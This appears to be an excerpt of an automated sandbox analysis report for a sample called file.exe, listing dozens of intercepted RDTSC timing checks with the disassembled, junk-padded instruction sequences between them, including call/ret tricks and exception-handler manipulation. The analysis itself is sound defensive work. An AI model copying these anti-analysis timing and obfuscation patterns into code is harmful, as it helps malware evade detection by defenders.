                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A269 second address: 103A28E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D477636Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB0D4776371h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A375 second address: 103A37B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A37B second address: 103A385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FB0D4776366h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A385 second address: 103A3A1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB0D54BC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB0D54BC06Ah 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A3A1 second address: 103A3C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB0D4776373h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A3C3 second address: 103A3EE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB0D54BC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007FB0D54BC06Ah 0x00000014 pop eax 0x00000015 adc edi, 0BAB9718h 0x0000001b lea ebx, dword ptr [ebp+1245C164h] 0x00000021 push eax 0x00000022 push ecx 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A4DA second address: 103A53F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4776373h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB0D4776373h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jo 00007FB0D477636Ch 0x0000001a jng 00007FB0D4776366h 0x00000020 jmp 00007FB0D4776373h 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 pushad 0x00000029 jmp 00007FB0D477636Eh 0x0000002e push eax 0x0000002f push edx 0x00000030 push edi 0x00000031 pop edi 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A53F second address: 103A59D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB0D54BC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007FB0D54BC074h 0x00000014 pop eax 0x00000015 mov cx, di 0x00000018 mov esi, dword ptr [ebp+122D2A9Ah] 0x0000001e lea ebx, dword ptr [ebp+1245C16Dh] 0x00000024 call 00007FB0D54BC079h 0x00000029 jmp 00007FB0D54BC06Bh 0x0000002e pop ecx 0x0000002f push eax 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 pop eax 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A59D second address: 103A5A7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CBF5 second address: 105CBFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CBFB second address: 105CBFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CBFF second address: 105CC03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CC03 second address: 105CC15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FB0D4776366h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CC15 second address: 105CC35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D54BC079h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CC35 second address: 105CC3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105AB45 second address: 105AB49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105AB49 second address: 105AB4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105AB4F second address: 105AB5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FB0D54BC072h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105AB5D second address: 105AB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB0D4776366h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BB3F second address: 105BB45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BC8F second address: 105BCA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FB0D477636Ch 0x0000000c jnc 00007FB0D4776366h 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BCA9 second address: 105BCC7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB0D54BC072h 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FB0D54BC066h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BCC7 second address: 105BCCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BCCB second address: 105BCCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052C0C second address: 1052C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052C14 second address: 1052C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052C19 second address: 1052C38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FB0D4776379h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C38B second address: 105C3A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 ja 00007FB0D54BC066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007FB0D54BC06Ch 0x00000012 jng 00007FB0D54BC066h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C3A3 second address: 105C3A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105FB0B second address: 105FB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063411 second address: 1063417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063417 second address: 1063434 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D54BC079h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063434 second address: 1063440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063440 second address: 1063444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066C6C second address: 1066C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B038 second address: 106B041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B041 second address: 106B04C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007FB0D4776366h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B04C second address: 106B059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FB0D54BC066h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A763 second address: 106A774 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D477636Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A774 second address: 106A78C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB0D54BC06Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007FB0D54BC066h 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007FB0D54BC066h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106AB9B second address: 106ABB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0D477636Fh 0x00000009 pop ecx 0x0000000a push eax 0x0000000b jnp 00007FB0D4776366h 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106ABB9 second address: 106ABCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FB0D54BC066h 0x0000000a jmp 00007FB0D54BC06Ch 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106AD77 second address: 106AD7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106AD7B second address: 106AD81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106AD81 second address: 106AD9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4776371h 0x00000007 je 00007FB0D477636Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B705 second address: 106B70C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B9D2 second address: 106B9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B9D6 second address: 106B9E0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB0D54BC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B9E0 second address: 106B9E5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C250 second address: 106C27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp], ebx 0x00000009 jg 00007FB0D54BC06Ch 0x0000000f sub dword ptr [ebp+122D1B75h], edx 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB0D54BC072h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C798 second address: 106C7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0D4776372h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D69C second address: 106D726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D54BC073h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB0D54BC06Bh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FB0D54BC068h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov dword ptr [ebp+124862F3h], ecx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007FB0D54BC068h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c mov edi, 7BBD31E4h 0x00000051 sub dword ptr [ebp+122D1B1Fh], esi 0x00000057 push 00000000h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e ja 00007FB0D54BC066h 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D726 second address: 106D730 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB0D4776366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106E8B5 second address: 106E8BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106E8BA second address: 106E8C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FB0D4776366h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106DFA8 second address: 106DFAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106E8C4 second address: 106E8EA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB0D4776366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FB0D4776377h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106E8EA second address: 106E902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0D54BC074h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F2D2 second address: 106F322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 jnp 00007FB0D4776366h 0x0000000f push 00000000h 0x00000011 jg 00007FB0D4776384h 0x00000017 jng 00007FB0D4776369h 0x0000001d mov di, bx 0x00000020 push 00000000h 0x00000022 sbb si, 8604h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c je 00007FB0D4776366h 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F322 second address: 106F326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F326 second address: 106F32C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106FCB3 second address: 106FCEE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB0D54BC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f mov ebx, dword ptr [ebp+122D2C4Ah] 0x00000015 sub dword ptr [ebp+122D1B1Fh], edi 0x0000001b popad 0x0000001c push 00000000h 0x0000001e cmc 0x0000001f push 00000000h 0x00000021 mov dword ptr [ebp+122D2E30h], edi 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FB0D54BC071h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106FCEE second address: 106FCF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10710CB second address: 10710D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10710D0 second address: 1071131 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB0D477637Fh 0x00000008 jmp 00007FB0D4776379h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push esi 0x00000011 sub esi, 3B28250Dh 0x00000017 pop esi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007FB0D4776368h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 mov edi, dword ptr [ebp+122D276Ch] 0x0000003a push 00000000h 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f js 00007FB0D477636Ch 0x00000045 jns 00007FB0D4776366h 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071B96 second address: 1071C01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov dword ptr [ebp+12488BDDh], esi 0x0000000d push 00000000h 0x0000000f or esi, dword ptr [ebp+1245D4F5h] 0x00000015 sub dword ptr [ebp+122D1816h], eax 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007FB0D54BC068h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 mov di, bx 0x0000003a jmp 00007FB0D54BC071h 0x0000003f xchg eax, ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FB0D54BC079h 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071C01 second address: 1071C07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071C07 second address: 1071C0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071C0C second address: 1071C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FB0D4776378h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071C32 second address: 1071C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075DA0 second address: 1075DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074E0C second address: 1074E13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075F62 second address: 1075FE4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov bx, E0A7h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 xor di, A038h 0x00000019 jmp 00007FB0D4776371h 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 cmc 0x00000026 mov eax, dword ptr [ebp+122D083Dh] 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007FB0D4776368h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 push FFFFFFFFh 0x00000048 push 00000000h 0x0000004a push ebx 0x0000004b call 00007FB0D4776368h 0x00000050 pop ebx 0x00000051 mov dword ptr [esp+04h], ebx 0x00000055 add dword ptr [esp+04h], 0000001Ah 0x0000005d inc ebx 0x0000005e push ebx 0x0000005f ret 0x00000060 pop ebx 0x00000061 ret 0x00000062 nop 0x00000063 push eax 0x00000064 push edx 0x00000065 push ecx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074E13 second address: 1074EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FB0D54BC068h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D2B6Ah] 0x0000002a jnp 00007FB0D54BC06Ch 0x00000030 mov di, bx 0x00000033 push dword ptr fs:[00000000h] 0x0000003a or dword ptr [ebp+124575AFh], eax 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 mov bh, 8Fh 0x00000049 mov eax, dword ptr [ebp+122D156Dh] 0x0000004f mov edi, esi 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push esi 0x00000056 call 00007FB0D54BC068h 0x0000005b pop esi 0x0000005c mov dword ptr [esp+04h], esi 0x00000060 add dword ptr [esp+04h], 00000017h 0x00000068 inc esi 0x00000069 push esi 0x0000006a ret 0x0000006b pop esi 0x0000006c ret 0x0000006d jo 00007FB0D54BC066h 0x00000073 push eax 0x00000074 pushad 0x00000075 jc 00007FB0D54BC072h 0x0000007b jmp 00007FB0D54BC06Ch 0x00000080 push eax 0x00000081 push edx 0x00000082 jne 00007FB0D54BC066h 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075FE4 second address: 1075FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D814 second address: 101D824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FB0D54BC066h 0x0000000a jnc 00007FB0D54BC066h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A432 second address: 107A43C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FB0D4776366h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079592 second address: 10795C0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB0D54BC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FB0D54BC079h 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A43C second address: 107A44A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A44A second address: 107A44E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
